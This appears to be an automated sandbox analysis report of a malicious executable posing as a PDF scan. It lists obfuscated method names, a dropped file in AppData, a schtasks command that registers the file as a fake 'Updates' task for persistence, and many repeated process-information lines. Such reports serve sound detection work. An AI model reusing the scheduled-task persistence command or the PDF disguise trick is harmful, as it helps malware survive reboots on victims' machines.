Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, l0rTNDqyDaNsKGgWCtZ.cs	High entropy of concatenated method names: 'XjgFvhYvZ8', 'trIFLWHgDA', 'G5aFAsD7uD', 'TFVFicf4ki', 'xbeFoZ8cQf', 'GQDF0l2Cfj', 'IuvFm60byb', 'kt6FQMf7ZQ', 'TcQF1rMdSM', 'yLgFp3gdpY'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, OcYj6lwsu9665C7RdN.cs	High entropy of concatenated method names: 'Dispose', 'utqqJqXZKy', 'nLGfti9LC0', 'rwxAAqilNt', 'a81qO4uEPZ', 'f2pqzWTOX8', 'ProcessDialogKey', 'WEhfyTvxxm', 'BtxfqLVN9S', 'uyrffO6jpp'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, beyHOCpHso4XwCAhW9.cs	High entropy of concatenated method names: 'kSoeonxfvJ', 'fS7emnTJKH', 'sZk4lldOeZ', 'k6549X86vM', 'j9j4jV1576', 'fBR4KYhm8Z', 'pv847YPTat', 'bPS4r7rUdN', 'tLC4nRCt4I', 'TCx4Z2KOTT'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, TZMrSA5bjF9p5nJuyn.cs	High entropy of concatenated method names: 'CAZqC4HVLf', 'IWEqRtmNwY', 'iguq3rdFYd', 'N8Eq6UqeyH', 'jAhqkW9Tx9', 'xSlqcKqPeR', 'lpgO2aN2q0cKvS865v', 'O67kPTA5rUHnVUQWb2', 'K5NqqsCeAN', 'uEsqMxCOmY'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, l3jrCG705X6hFIo3hF.cs	High entropy of concatenated method names: 'IFJCBJTUAx', 'Od3C4pm37W', 'WxOCEBX913', 'T8SEOrFEdZ', 'lPNEzp6weZ', 'tqjCytTKls', 'lV9CqGDwN8', 'rg1CfVJvYV', 'E0kCMqHcGw', 'e5LC50dHlv'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, V2mHZPR0N4oyaDDFW0.cs	High entropy of concatenated method names: 'MwbMU6oMTV', 'LhdMBfOSIY', 's59MwpBZPo', 'qZyM4PNQZ1', 'kNgMewummS', 'TAjME3oBAR', 'FxAMCnwo25', 'qDnMR0mMjX', 'JjhM2Enxy6', 'lI0M3CVgj7'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, N4HVLfQlWEtmNwYgDD.cs	High entropy of concatenated method names: 'caJw8qpg4T', 'lcpwsc7S67', 'aolwNLcUXm', 'GItwSa5kp7', 'whswPCY0XH', 'HNCwVgKREm', 'ih4wXWOdmC', 'RSYwIMn15b', 'LAiwJ2KaVY', 'XRIwO2sffO'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, LijqxanU7dEpkg6cli.cs	High entropy of concatenated method names: 'ssVCvpAh2R', 'sVaCLKyxWT', 'cmKCAAenyY', 'BotCi2YNRm', 'Nx4Coi2MCw', 'thbC0obhQL', 'ndNCmRYRfA', 'TZKCQGAUJJ', 'bgVC1xmXyp', 'O6wCpE5EJA'

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

File created: C:\Users\user\AppData\Roaming\QeSBxb.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpC1CB.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
